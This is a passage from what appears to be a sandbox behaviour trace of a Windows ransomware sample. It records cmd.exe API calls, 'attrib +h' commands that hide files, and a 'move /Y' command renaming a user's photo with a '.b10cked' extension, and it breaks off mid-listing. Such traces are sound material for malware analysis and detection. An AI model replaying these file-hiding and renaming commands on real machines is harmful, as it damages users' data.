lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.670] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.671] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.672] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.673] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.698] _close (_FileHandle=4) returned 0 [0146.699] FindNextFileW (in: hFindFile=0x41e798, lpFindFileData=0x26ede8 | out: lpFindFileData=0x26ede8) returned 0 [0146.700] GetLastError () returned 0x12 [0146.700] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.700] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.708] _close (_FileHandle=3) returned 0 [0146.708] GetConsoleTitleW (in: lpConsoleTitle=0x26f220, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.708] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.709] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.709] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.709] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.709] GetLastError () returned 0x2 [0146.709] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.709] GetLastError () returned 0x2 [0146.709] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.709] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.710] GetLastError () returned 0x2 [0146.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.710] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.710] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0146.710] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0146.710] GetConsoleTitleW (in: lpConsoleTitle=0x26efb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.710] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ee3c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ef04 | out: lpAttributeList=0x26ee3c, lpSize=0x26ef04) returned 1 [0146.710] UpdateProcThreadAttribute (in: lpAttributeList=0x26ee3c, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eefc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ee3c, lpPreviousValue=0x0) returned 1 [0146.710] GetStartupInfoW (in: lpStartupInfo=0x26edf8 | out: lpStartupInfo=0x26edf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0146.710] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.710] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ee98*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26eee4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessInformation=0x26eee4*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb30, dwThreadId=0xb5c)) returned 1 [0146.712] CloseHandle (hObject=0x50) returned 1 [0146.712] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.712] GetEnvironmentStringsW () returned 0x422e78* [0146.712] FreeEnvironmentStringsW (penv=0x422e78) returned 1 [0146.712] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0146.754] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26edd8 | out: lpExitCode=0x26edd8*=0x0) returned 1 [0146.754] CloseHandle (hObject=0x4c) returned 1 [0146.754] _vsnwprintf (in: _Buffer=0x26ef20, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ede4 | out: _Buffer="00000000") returned 8 [0146.754] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0146.754] GetEnvironmentStringsW () returned 0x422e78* [0146.755] FreeEnvironmentStringsW (penv=0x422e78) returned 1 [0146.755] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.755] GetEnvironmentStringsW () returned 0x422e78* [0146.755] FreeEnvironmentStringsW (penv=0x422e78) returned 1 [0146.755] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ee3c | out: lpAttributeList=0x26ee3c) [0146.755] GetConsoleTitleW (in: lpConsoleTitle=0x26f220, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.755] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.755] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.755] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.755] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.755] GetLastError () returned 0x2 [0146.755] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.756] GetLastError () returned 0x2 [0146.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.756] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0xffffffff [0146.756] GetLastError () returned 0x2 [0146.756] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eabc) returned 0x41e798 [0146.756] FindClose (in: hFindFile=0x41e798 | out: hFindFile=0x41e798) returned 1 [0146.756] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0146.756] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0146.756] GetConsoleTitleW (in: lpConsoleTitle=0x26efb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.756] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ee3c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ef04 | out: lpAttributeList=0x26ee3c, lpSize=0x26ef04) returned 1 [0146.756] UpdateProcThreadAttribute (in: lpAttributeList=0x26ee3c, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eefc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ee3c, lpPreviousValue=0x0) returned 1 [0146.756] GetStartupInfoW (in: lpStartupInfo=0x26edf8 | out: lpStartupInfo=0x26edf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0146.757] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.757] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ee98*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26eee4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessInformation=0x26eee4*(hProcess=0x50, hThread=0x4c, dwProcessId=0x794, dwThreadId=0xba0)) returned 1 [0146.758] CloseHandle (hObject=0x4c) returned 1 [0146.758] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.758] GetEnvironmentStringsW () returned 0x423a78* [0146.758] FreeEnvironmentStringsW (penv=0x423a78) returned 1 [0146.758] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0146.792] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26edd8 | out: lpExitCode=0x26edd8*=0x0) returned 1 [0146.792] CloseHandle (hObject=0x50) returned 1 [0146.792] _vsnwprintf (in: _Buffer=0x26ef20, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ede4 | out: _Buffer="00000000") returned 8 [0146.792] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0146.793] GetEnvironmentStringsW () returned 0x423a78* [0146.793] FreeEnvironmentStringsW (penv=0x423a78) returned 1 [0146.793] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.793] GetEnvironmentStringsW () returned 0x423a78* [0146.793] FreeEnvironmentStringsW (penv=0x423a78) returned 1 [0146.793] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ee3c | out: lpAttributeList=0x26ee3c) [0146.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.793] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.793] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.793] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.794] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.794] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.794] SetConsoleInputExeNameW () returned 0x1 [0146.794] GetConsoleOutputCP () returned 0x1b5 [0146.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.794] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.794] exit (_Code=0) Process: id = "204" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16de0" os_pid = "0xaf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17675 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17676 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17677 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17678 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 17679 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17680 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17681 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17682 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17683 start_va = 0x7ffdd000 end_va = 0x7ffddfff 